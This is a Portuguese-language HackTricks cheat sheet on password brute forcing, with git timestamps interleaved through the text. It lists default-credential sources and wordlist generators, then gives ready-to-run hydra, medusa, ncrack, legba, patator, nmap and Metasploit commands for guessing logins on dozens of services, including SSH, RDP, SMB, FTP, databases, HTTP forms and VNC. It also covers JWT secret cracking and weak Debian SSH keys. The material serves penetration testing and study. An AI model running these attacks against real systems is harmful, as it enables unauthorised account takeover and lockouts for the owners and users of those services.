2022-05-01 13:25:53 +00:00
# Brute Force - CheatSheet
2022-04-28 16:01:33 +00:00
2024-05-05 22:04:08 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-07-18 22:06:26 +00:00
Use [**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force ) para construir e **automatizar fluxos de trabalho** facilmente com as **ferramentas** da comunidade **mais avançadas** do mundo.\
2024-02-06 03:39:16 +00:00
Acesse hoje:
2022-08-31 22:35:39 +00:00
2024-05-06 11:08:52 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=brute-force" %}
2022-08-31 22:35:39 +00:00
2024-07-18 22:06:26 +00:00
{% hint style="success" %}
Aprenda e pratique Hacking AWS:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Aprenda e pratique Hacking GCP: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-18 22:06:26 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-18 22:06:26 +00:00
< summary > Support HackTricks< / summary >
2023-12-30 12:05:49 +00:00
2024-07-18 22:06:26 +00:00
* Confira os [**planos de assinatura** ](https://github.com/sponsors/carlospolop )!
* **Junte-se ao** 💬 [**grupo do Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo do telegram** ](https://t.me/peass ) ou **siga** -nos no **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Compartilhe truques de hacking enviando PRs para os** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) repositórios do github.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-18 22:06:26 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-04-16 03:24:52 +00:00
## Credenciais Padrão
2020-07-15 15:43:14 +00:00
2024-07-18 22:06:26 +00:00
**Pesquise no google** por credenciais padrão da tecnologia que está sendo usada, ou **tente estes links** :
2020-07-15 15:43:14 +00:00
2021-05-31 09:39:02 +00:00
* [**https://github.com/ihebski/DefaultCreds-cheat-sheet** ](https://github.com/ihebski/DefaultCreds-cheat-sheet )
* [**http://www.phenoelit.org/dpl/dpl.html** ](http://www.phenoelit.org/dpl/dpl.html )
* [**http://www.vulnerabilityassessment.co.uk/passwordsC.htm** ](http://www.vulnerabilityassessment.co.uk/passwordsC.htm )
* [**https://192-168-1-1ip.mobi/default-router-passwords-list/** ](https://192-168-1-1ip.mobi/default-router-passwords-list/ )
* [**https://datarecovery.com/rd/default-passwords/** ](https://datarecovery.com/rd/default-passwords/ )
* [**https://bizuns.com/default-passwords-list** ](https://bizuns.com/default-passwords-list )
* [**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv** ](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv )
* [**https://github.com/Dormidera/WordList-Compendium** ](https://github.com/Dormidera/WordList-Compendium )
* [**https://www.cirt.net/passwords** ](https://www.cirt.net/passwords )
2021-11-24 15:00:38 +00:00
* [**http://www.passwordsdatabase.com/** ](http://www.passwordsdatabase.com )
2022-04-05 22:24:52 +00:00
* [**https://many-passwords.github.io/** ](https://many-passwords.github.io )
2024-07-18 22:06:26 +00:00
* [**https://theinfocentric.com/** ](https://theinfocentric.com/ )
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:52 +00:00
## **Crie seus próprios Dicionários**
2020-07-15 15:43:14 +00:00
2024-05-05 22:04:08 +00:00
Encontre o máximo de informações sobre o alvo que puder e gere um dicionário personalizado. Ferramentas que podem ajudar:
2024-04-06 19:38:49 +00:00
2024-04-16 03:24:52 +00:00
### Crunch
2020-11-30 15:34:43 +00:00
```bash
2020-07-15 15:43:14 +00:00
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%
```
2024-04-16 03:24:52 +00:00
### Cewl
2020-07-15 15:43:14 +00:00
```bash
cewl example.com -m 5 -w words.txt
```
2024-04-16 03:24:52 +00:00
### [CUPP](https://github.com/Mebus/cupp)
2020-11-03 11:04:12 +00:00
2024-07-18 22:06:26 +00:00
Gere senhas com base no seu conhecimento da vítima (nomes, datas...)
2021-11-24 15:00:38 +00:00
```
2020-11-03 11:04:12 +00:00
python3 cupp.py -h
```
2024-04-16 03:24:52 +00:00
### [Wister](https://github.com/cycurity/wister)
2023-04-15 21:35:06 +00:00
2024-07-18 22:06:26 +00:00
Uma ferramenta geradora de listas de palavras, que permite que você forneça um conjunto de palavras, dando a você a possibilidade de criar múltiplas variações a partir das palavras fornecidas, criando uma lista de palavras única e ideal para usar em relação a um alvo específico.
2023-04-15 21:35:06 +00:00
```bash
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
2023-09-03 18:16:00 +00:00
__ _______ _____ _______ ______ _____
\ \ / /_ _|/ ____ |__ __ | ____ | __ \
\ \ /\ / / | | | (___ | | | |__ | |__) |
\ \/ \/ / | | \___ \ | | | __ | | _ /
\ /\ / _| |_ ____ ) | | | | |____| | \ \
\/ \/ |_____|_____/ |_| |______|_| \_\
Version 1.0.3 Cycurity
2023-04-15 21:35:06 +00:00
Generating wordlist...
[########################################] 100%
Generated 67885 lines.
Finished in 0.920s.
```
2024-04-16 03:24:52 +00:00
### [pydictor](https://github.com/LandGrey/pydictor)
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:52 +00:00
### Listas de Palavras
2020-07-15 15:43:14 +00:00
2021-05-31 09:39:02 +00:00
* [**https://github.com/danielmiessler/SecLists** ](https://github.com/danielmiessler/SecLists )
* [**https://github.com/Dormidera/WordList-Compendium** ](https://github.com/Dormidera/WordList-Compendium )
* [**https://github.com/kaonashi-passwords/Kaonashi** ](https://github.com/kaonashi-passwords/Kaonashi )
2023-09-03 18:16:00 +00:00
* [**https://github.com/google/fuzzing/tree/master/dictionaries** ](https://github.com/google/fuzzing/tree/master/dictionaries )
2021-05-31 09:39:02 +00:00
* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm** ](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm )
2023-04-15 21:35:06 +00:00
* [**https://weakpass.com/wordlist/** ](https://weakpass.com/wordlist/ )
* [**https://wordlists.assetnote.io/** ](https://wordlists.assetnote.io/ )
* [**https://github.com/fssecur3/fuzzlists** ](https://github.com/fssecur3/fuzzlists )
* [**https://hashkiller.io/listmanager** ](https://hashkiller.io/listmanager )
* [**https://github.com/Karanxa/Bug-Bounty-Wordlists** ](https://github.com/Karanxa/Bug-Bounty-Wordlists )
2020-07-15 15:43:14 +00:00
2024-05-05 22:04:08 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-07-18 22:06:26 +00:00
Use [**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force ) para construir e **automatizar fluxos de trabalho** facilmente, impulsionados pelas **ferramentas comunitárias mais avançadas** do mundo.\
Obtenha Acesso Hoje:
2022-08-31 22:35:39 +00:00
2024-05-06 11:08:52 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=brute-force" %}
2022-08-31 22:35:39 +00:00
2024-04-16 03:24:52 +00:00
## Serviços
2020-07-15 15:43:14 +00:00
2024-07-18 22:06:26 +00:00
Ordenado alfabeticamente pelo nome do serviço.
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:52 +00:00
### AFP
2020-07-15 15:43:14 +00:00
```bash
nmap -p 548 --script afp-brute < IP >
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE < PATH_PASSWDS >
msf> set USER_FILE < PATH_USERS >
msf> run
```
2024-04-16 03:24:52 +00:00
### AJP
2020-07-15 15:43:14 +00:00
```bash
nmap --script ajp-brute -p 8009 < IP >
```
2024-07-18 22:06:26 +00:00
## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM e Solace)
2023-12-26 21:42:42 +00:00
```bash
legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]
```
2024-04-16 03:24:52 +00:00
### Cassandra
2020-07-15 15:43:14 +00:00
```bash
nmap --script cassandra-brute -p 9160 < IP >
2023-12-26 21:42:42 +00:00
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### CouchDB
2020-07-15 15:43:14 +00:00
```bash
msf> use auxiliary/scanner/couchdb/couchdb_login
2021-01-03 00:43:09 +00:00
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
```
2024-04-16 03:24:52 +00:00
### Registro do Docker
2021-11-24 15:00:38 +00:00
```
2021-01-03 00:43:09 +00:00
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
2020-07-17 23:59:16 +00:00
```
2024-04-16 03:24:52 +00:00
### Elasticsearch
2021-11-24 15:00:38 +00:00
```
2021-01-03 00:43:09 +00:00
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### FTP
2020-07-15 15:43:14 +00:00
```bash
hydra -l root -P passwords.txt [-t 32] < IP > ftp
ncrack -p 21 --user root -P passwords.txt < IP > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < IP > -M ftp
2023-12-26 21:42:42 +00:00
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
2020-07-15 15:43:14 +00:00
```
2024-07-18 22:06:26 +00:00
### HTTP Genérico Brute
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:52 +00:00
#### [**WFuzz**](../pentesting-web/web-tool-wfuzz.md)
2020-07-15 15:43:14 +00:00
2024-07-18 22:06:26 +00:00
### HTTP Autenticação Básica
2020-07-15 15:43:14 +00:00
```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
2022-09-12 15:29:22 +00:00
# Use https-get mode for https
2020-07-15 15:43:14 +00:00
medusa -h < IP > -u < username > -P < passwords.txt > -M http -m DIR:/path/to/auth -T 10
2023-12-26 21:42:42 +00:00
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### HTTP - NTLM
2023-12-26 21:42:42 +00:00
```bash
legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
```
2024-04-16 03:24:52 +00:00
### HTTP - Post Form
2020-07-15 15:43:14 +00:00
```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^& password=^PASS^& enter=Sign+in:Login name or password is incorrect" -V
2022-09-12 15:29:22 +00:00
# Use https-post-form mode for https
2020-07-15 15:43:14 +00:00
```
2024-02-06 03:39:16 +00:00
Para http**s** você tem que mudar de "http-post-form" para "**https-post-form"**
2020-07-15 15:43:14 +00:00
2024-07-18 22:06:26 +00:00
### **HTTP - CMS --** (W)ordpress, (J)oomla ou (D)rupal ou (M)oodle
2020-07-15 15:43:14 +00:00
```bash
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
2023-12-26 21:42:42 +00:00
# Check also https://github.com/evilsocket/legba/wiki/HTTP
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### IMAP
2020-07-15 15:43:14 +00:00
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f < IP > imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f < IP > imap -V
nmap -sV --script imap-brute -p < PORT > < IP >
2023-12-26 21:42:42 +00:00
legba imap --username user --password data/passwords.txt --target localhost:993
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### IRC
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p < PORT > < IP >
```
2024-04-16 03:24:52 +00:00
### ISCSI
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 < IP >
```
2024-04-16 03:24:52 +00:00
### JWT
2021-03-08 16:25:26 +00:00
```bash
#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt < JWT token >
#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
```
2024-04-16 03:24:52 +00:00
### LDAP
2020-07-15 15:43:14 +00:00
```bash
nmap --script ldap-brute -p 389 < IP >
2023-12-26 21:42:42 +00:00
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords .txt --ldap-domain example.org --single-match
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### MQTT
2022-02-19 19:42:58 +00:00
```
ncrack mqtt://127.0.0.1 --user test – P /root/Desktop/pass.txt -v
2023-12-26 21:42:42 +00:00
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt
2022-02-19 19:42:58 +00:00
```
2024-04-16 03:24:52 +00:00
### Mongo
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script mongodb-brute -n -p 27017 < IP >
use auxiliary/scanner/mongodb/mongodb_login
2023-12-26 21:42:42 +00:00
legba mongodb --target localhost:27017 --username root --password data/passwords.txt
```
2024-04-16 03:24:52 +00:00
### MSSQL
2023-12-26 21:42:42 +00:00
```bash
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### MySQL
2020-07-15 15:43:14 +00:00
```bash
2021-11-21 17:03:07 +00:00
# hydra
2020-07-15 15:43:14 +00:00
hydra -L usernames.txt -P pass.txt < IP > mysql
2021-11-21 17:03:07 +00:00
# msfconsole
2020-07-15 15:43:14 +00:00
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
2021-11-21 17:03:07 +00:00
# medusa
medusa -h < IP / Host > -u < username > -P < password_list > < -f | to stop medusa on first success attempt > -t < threads > -M mysql
2023-09-03 18:16:00 +00:00
2023-12-26 21:42:42 +00:00
#Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306
```
2024-04-16 03:24:52 +00:00
### OracleSQL
2020-07-15 15:43:14 +00:00
```bash
patator oracle_login sid=< SID > host=< IP > user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS < IP >
msf> set RPORT 1521
msf> set SID < SID >
#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS < IP >
msf> set RPORTS 1521
msf> set SID < SID >
2022-09-12 15:29:22 +00:00
#for some reason nmap fails sometimes when executing this script
2020-07-15 15:43:14 +00:00
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=< SID > < IP >
2023-12-26 21:42:42 +00:00
legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt
2020-07-15 15:43:14 +00:00
```
2024-07-18 22:06:26 +00:00
Para usar **oracle\_login** com **patator** você precisa **instalar** :
2020-07-15 15:43:14 +00:00
```bash
pip3 install cx_Oracle --upgrade
```
2024-07-18 22:06:26 +00:00
[Offline OracleSQL hash bruteforce ](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force ) (**versões 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** e **11.2.0.3** ):
2020-07-15 15:43:14 +00:00
```bash
2023-09-03 18:16:00 +00:00
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### POP
2020-07-15 15:43:14 +00:00
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f < IP > pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f < IP > pop3 -V
2023-10-15 21:04:17 +00:00
2023-12-26 21:42:42 +00:00
# Insecure
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110
2023-10-15 21:04:17 +00:00
2023-12-26 21:42:42 +00:00
# SSL
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl
```
2024-04-16 03:24:52 +00:00
### PostgreSQL
2020-07-15 15:43:14 +00:00
```bash
hydra -L /root/Desktop/user.txt – P /root/Desktop/pass.txt < IP > postgres
medusa -h < IP > – U /root/Desktop/user.txt – P /root/Desktop/pass.txt – M postgres
ncrack – v – U /root/Desktop/user.txt – P /root/Desktop/pass.txt < IP > :5432
patator pgsql_login host=< IP > user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 < IP >
2023-12-26 21:42:42 +00:00
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### PPTP
2020-07-15 15:43:14 +00:00
2024-02-06 03:39:16 +00:00
Você pode baixar o pacote `.deb` para instalar em [https://http.kali.org/pool/main/t/thc-pptp-bruter/ ](https://http.kali.org/pool/main/t/thc-pptp-bruter/ )
2020-07-15 15:43:14 +00:00
```bash
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter – u < Username > < IP >
```
2024-04-16 03:24:52 +00:00
### RDP
2020-07-15 15:43:14 +00:00
```bash
ncrack -vv --user < User > -P pwds.txt rdp://< IP >
hydra -V -f -L < userslist > -P < passwlist > rdp://< IP >
2023-12-26 21:42:42 +00:00
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain < RDP_DOMAIN > ] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### Redis
2020-07-15 15:43:14 +00:00
```bash
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 < IP >
2021-08-27 00:14:28 +00:00
hydra – P /path/pass.txt redis://< IP > :< PORT > # 6379 is the default
2023-12-26 21:42:42 +00:00
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### Rexec
2020-07-15 15:43:14 +00:00
```bash
hydra -l < username > -P < password_file > rexec://< Victim-IP > -v -V
```
2024-04-16 03:24:52 +00:00
### Rlogin
2020-07-15 15:43:14 +00:00
```bash
hydra -l < username > -P < password_file > rlogin://< Victim-IP > -v -V
```
2024-04-16 03:24:52 +00:00
### Rsh
2020-07-15 15:43:14 +00:00
```bash
hydra -L < Username_list > rsh://< Victim_IP > -v -V
```
2024-01-10 07:09:16 +00:00
[http://pentestmonkey.net/tools/misc/rsh-grind ](http://pentestmonkey.net/tools/misc/rsh-grind )
2024-04-16 03:24:52 +00:00
### Rsync
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 < IP >
```
2024-04-16 03:24:52 +00:00
### RTSP
2020-07-15 15:43:14 +00:00
```bash
hydra -l root -P passwords.txt < IP > rtsp
```
2024-04-16 03:24:52 +00:00
### SFTP
2023-12-26 21:42:42 +00:00
```bash
legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
```
2024-04-16 03:24:52 +00:00
### SNMP
2020-07-15 15:43:14 +00:00
```bash
msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute < target > [--script-args snmp-brute.communitiesdb=< wordlist > ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt < IP >
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
```
2024-04-16 03:24:52 +00:00
### SMB
2020-07-15 15:43:14 +00:00
```bash
nmap --script smb-brute -p 445 < IP >
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
2023-12-26 21:42:42 +00:00
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup < SMB_WORKGROUP > ] [--smb-share < SMB_SHARE > ]
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### SMTP
2020-07-15 15:43:14 +00:00
```bash
hydra -l < username > -P /path/to/passwords.txt < IP > smtp -V
hydra -l < username > -P /path/to/passwords.txt -s 587 < IP > -S -v -V #Port 587 for SMTP with SSL
2023-12-26 21:42:42 +00:00
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism < mech > ]
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### SOCKS
2021-05-13 16:02:48 +00:00
```bash
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 < IP >
2023-12-26 21:42:42 +00:00
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080
2021-05-13 16:02:48 +00:00
```
2024-04-16 03:24:52 +00:00
### SQL Server
2020-07-15 15:43:14 +00:00
```bash
#Use the NetBIOS name of the machine as domain
2020-09-20 22:23:18 +00:00
crackmapexec mssql < IP > -d < Domain Name > -u usernames.txt -p passwords.txt
2020-07-15 15:43:14 +00:00
hydra -L /root/Desktop/user.txt – P /root/Desktop/pass.txt < IP > mssql
medusa -h < IP > – U /root/Desktop/user.txt – P /root/Desktop/pass.txt – M mssql
2022-09-12 15:29:22 +00:00
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts < host > #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### SSH
2023-12-26 21:42:42 +00:00
```bash
hydra -l root -P passwords.txt [-t 32] < IP > ssh
ncrack -p 22 --user root -P passwords.txt < IP > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < IP > -M ssh
patator ssh_login host=< ip > port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
```
2024-07-18 22:06:26 +00:00
#### Chaves SSH fracas / PRNG previsível do Debian
2024-04-06 19:38:49 +00:00
2024-07-18 22:06:26 +00:00
Alguns sistemas têm falhas conhecidas na semente aleatória usada para gerar material criptográfico. Isso pode resultar em um espaço de chave dramaticamente reduzido que pode ser atacado por força bruta com ferramentas como [snowdroppe/ssh-keybrute ](https://github.com/snowdroppe/ssh-keybrute ). Conjuntos pré-gerados de chaves fracas também estão disponíveis, como [g0tmi1k/debian-ssh ](https://github.com/g0tmi1k/debian-ssh ).
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:52 +00:00
### STOMP (ActiveMQ, RabbitMQ, HornetQ e OpenMQ)
2023-09-24 14:17:07 +00:00
2024-07-18 22:06:26 +00:00
O protocolo de texto STOMP é um protocolo de mensagens amplamente utilizado que **permite comunicação e interação contínuas com serviços populares de enfileiramento de mensagens** como RabbitMQ, ActiveMQ, HornetQ e OpenMQ. Ele fornece uma abordagem padronizada e eficiente para trocar mensagens e realizar várias operações de mensagens.
2023-12-26 21:42:42 +00:00
```bash
legba stomp --target localhost:61613 --username admin --password data/passwords.txt
```
2024-04-16 03:24:52 +00:00
### Telnet
2020-07-15 15:43:14 +00:00
```bash
hydra -l root -P passwords.txt [-t 32] < IP > telnet
ncrack -p 23 --user root -P passwords.txt < IP > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < IP > -M telnet
2023-12-26 21:42:42 +00:00
legba telnet \
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### VNC
2020-07-15 15:43:14 +00:00
```bash
hydra -L /root/Desktop/user.txt – P /root/Desktop/pass.txt -s < PORT > < IP > vnc
2021-05-13 22:59:50 +00:00
medusa -h < IP > – u root -P /root/Desktop/pass.txt – M vnc
2020-07-15 15:43:14 +00:00
ncrack -V --user root -P /root/Desktop/pass.txt < IP > :>POR>T
2022-10-02 23:08:05 +00:00
patator vnc_login host=< IP > password=FILE0 0=/root/Desktop/pass.txt – t 1 – x retry:fgep!='Authentication failure' --max-retries 0 – x quit:code=0
use auxiliary/scanner/vnc/vnc_login
2024-04-16 03:24:52 +00:00
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt < IP >
2023-12-26 21:42:42 +00:00
legba vnc --target localhost:5901 --password data/passwords.txt
2022-01-10 10:36:14 +00:00
#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS < ip >
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:52 +00:00
### Winrm
2020-09-20 21:41:33 +00:00
```bash
crackmapexec winrm < IP > -d < Domain Name > -u usernames.txt -p passwords.txt
```
2024-05-05 22:04:08 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-09-03 18:16:00 +00:00
2023-12-26 21:42:42 +00:00
\
2024-07-18 22:06:26 +00:00
Use [**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force ) para construir e **automatizar fluxos de trabalho** facilmente com as **ferramentas** comunitárias **mais avançadas** do mundo.\
Acesse hoje:
2023-09-03 18:16:00 +00:00
2024-05-06 11:08:52 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=brute-force" %}
2023-09-03 18:16:00 +00:00
2024-04-16 03:24:52 +00:00
## Local
2020-07-15 15:43:14 +00:00
2024-07-18 22:06:26 +00:00
### Bancos de dados de cracking online
